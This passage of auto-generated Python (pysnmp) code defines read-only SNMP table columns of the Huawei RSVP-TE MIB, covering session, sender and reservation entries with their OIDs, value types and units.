hwRsvpTeSessionNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSessionNumber.setStatus('current')
hwRsvpTeSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionType.setStatus('current')
hwRsvpTeSessionDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddr.setStatus('current')
hwRsvpTeSessionDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddrLength.setStatus('current')
hwRsvpTeSessionSenders = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionSenders.setStatus('current')
hwRsvpTeSessionReceivers = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionReceivers.setStatus('current')
hwRsvpTeSessionRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionRequests.setStatus('current')
hwRsvpTeSessionTunnelId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelId.setStatus('current')
hwRsvpTeSessionTunnelExtId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelExtId.setStatus('current')
hwRsvpTeSessionLspsNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionLspsNumber.setStatus('current')
hwRsvpTeSessionStyle = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(10, 17, 18))).clone(namedValues=NamedValues(("ff", 10), ("wf", 17), ("se", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionStyle.setStatus('current')
hwRsvpTeSenderTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2), )
if mibBuilder.loadTexts: hwRsvpTeSenderTable.setStatus('current')
hwRsvpTeSenderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"))
if mibBuilder.loadTexts: hwRsvpTeSenderEntry.setStatus('current')
hwRsvpTeSenderNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSenderNumber.setStatus('current')
hwRsvpTeSenderType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderType.setStatus('current')
hwRsvpTeSenderDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddr.setStatus('current')
hwRsvpTeSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddr.setStatus('current')
hwRsvpTeSenderDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddrLength.setStatus('current')
hwRsvpTeSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddrLength.setStatus('current')
hwRsvpTeSenderHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopAddr.setStatus('current')
hwRsvpTeSenderHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopLih.setStatus('current')
hwRsvpTeSenderInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterface.setStatus('current')
hwRsvpTeSenderTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 10), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecRate.setStatus('current')
hwRsvpTeSenderTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecPeakRate.setStatus('current')
hwRsvpTeSenderTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 12), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecBurst.setStatus('current')
hwRsvpTeSenderTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 13), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMinTu.setStatus('current')
hwRsvpTeSenderTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMaxTu.setStatus('current')
hwRsvpTeSenderInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterval.setStatus('current')
hwRsvpTeSenderRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderRsvpHop.setStatus('current')
hwRsvpTeSenderPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 17), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65532))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderPolicy.setStatus('current')
hwRsvpTeSenderAdspecBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecBreak.setStatus('current')
hwRsvpTeSenderAdspecHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecHopCount.setStatus('current')
hwRsvpTeSenderAdspecPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 20), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecPathBw.setStatus('current')
hwRsvpTeSenderAdspecMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 21), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMinLatency.setStatus('current')
hwRsvpTeSenderAdspecMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 22), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMtu.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedSvc.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedBreak.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 25), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 26), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 27), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 28), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedHopCount.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 30), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedPathBw.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 31), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMinLatency.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 32), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMtu.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadSvc.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 34), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadBreak.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 35), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadHopCount.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 36), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadPathBw.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 37), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMinLatency.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 38), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMtu.setStatus('current')
hwRsvpTeSenderTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 39), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTtl.setStatus('current')
hwRsvpTeLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 40), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeLspId.setStatus('current')
hwRsvpTeSenderMsgIdSndFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 41), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndFlag.setStatus('current')
hwRsvpTeSenderMsgIdSndEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 42), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndEpoch.setStatus('current')
hwRsvpTeSenderMsgIdSndNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 43), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndNumber.setStatus('current')
hwRsvpTeSenderMsgIdRcvFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 44), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvFlag.setStatus('current')
hwRsvpTeSenderMsgIdRcvEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 45), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvEpoch.setStatus('current')
hwRsvpTeSenderMsgIdRcvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 46), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvNumber.setStatus('current')
hwRsvpTeSenderClassType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 47), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderClassType.setStatus('current')
hwRsvpTeSenderLabelRequestCtype = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("withoutLabelRange", 1), ("withAtmLabelRange", 2), ("withFrameRelayLabelRange", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestCtype.setStatus('current')
hwRsvpTeSenderLabelRequestL3pid = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 49), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestL3pid.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 50), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 51), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVci.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 52), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 53), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMinDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 54), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMinDlci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMaxDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 55), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMaxDlci.setStatus('current')
hwRsvpTeSenderSessionAttrType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 7))).clone(namedValues=NamedValues(("withRa", 1), ("withoutRa", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrType.setStatus('current')
hwRsvpTeSenderSessionAttrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 57), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrSetupPrio.setStatus('current')
hwRsvpTeSenderSessionAttrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 58), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrHoldPrio.setStatus('current')
hwRsvpTeSenderSessionAttrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 59), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrFlag.setStatus('current')
hwRsvpTeSenderSessionAttrName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 60), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrName.setStatus('current')
hwRsvpTeSenderSessionAttrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 61), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrExcludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 62), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 63), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 64), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrSetupPrio.setStatus('current')
hwRsvpTeSenderFrrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 65), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHoldPrio.setStatus('current')
hwRsvpTeSenderFrrHopLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 66), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHopLimit.setStatus('current')
hwRsvpTeSenderFrrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("oneToOneDesired", 1), ("facilityDesired", 2), ("noBackupDesired", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrFlag.setStatus('current')
hwRsvpTeSenderFrrBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 68), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrBandwidth.setStatus('current')
hwRsvpTeSenderFrrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 69), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrExcludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 70), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 71), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrInuseFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 72), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normal", 1), ("plrInUse", 2), ("mpInUse", 3), ("plrAndMpInUse", 4), ("underProtection", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrInuseFlag.setStatus('current')
hwRsvpTeSenderDiffServPsc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 73), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDiffServPsc.setStatus('current')
hwRsvpTeResvTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3), )
if mibBuilder.loadTexts: hwRsvpTeResvTable.setStatus('current')
hwRsvpTeResvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvEntry.setStatus('current')
hwRsvpTeResvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvNumber.setStatus('current')
hwRsvpTeResvType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvType.setStatus('current')
hwRsvpTeResvDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddr.setStatus('current')
hwRsvpTeResvSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddr.setStatus('current')
hwRsvpTeResvDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddrLength.setStatus('current')
hwRsvpTeResvSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddrLength.setStatus('current')
hwRsvpTeResvHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopAddr.setStatus('current')
hwRsvpTeResvHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopLih.setStatus('current')
hwRsvpTeResvInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterface.setStatus('current')
hwRsvpTeResvService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvService.setStatus('current')
hwRsvpTeResvTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecRate.setStatus('current')
hwRsvpTeResvTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecPeakRate.setStatus('current')
hwRsvpTeResvTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecBurst.setStatus('current')
hwRsvpTeResvTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMinTu.setStatus('current')
hwRsvpTeResvTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMaxTu.setStatus('current')
hwRsvpTeResvRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecRate.setStatus('current')
hwRsvpTeResvRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecSlack.setStatus('current')
hwRsvpTeResvInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterval.setStatus('current')
hwRsvpTeResvScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvScope.setStatus('current')
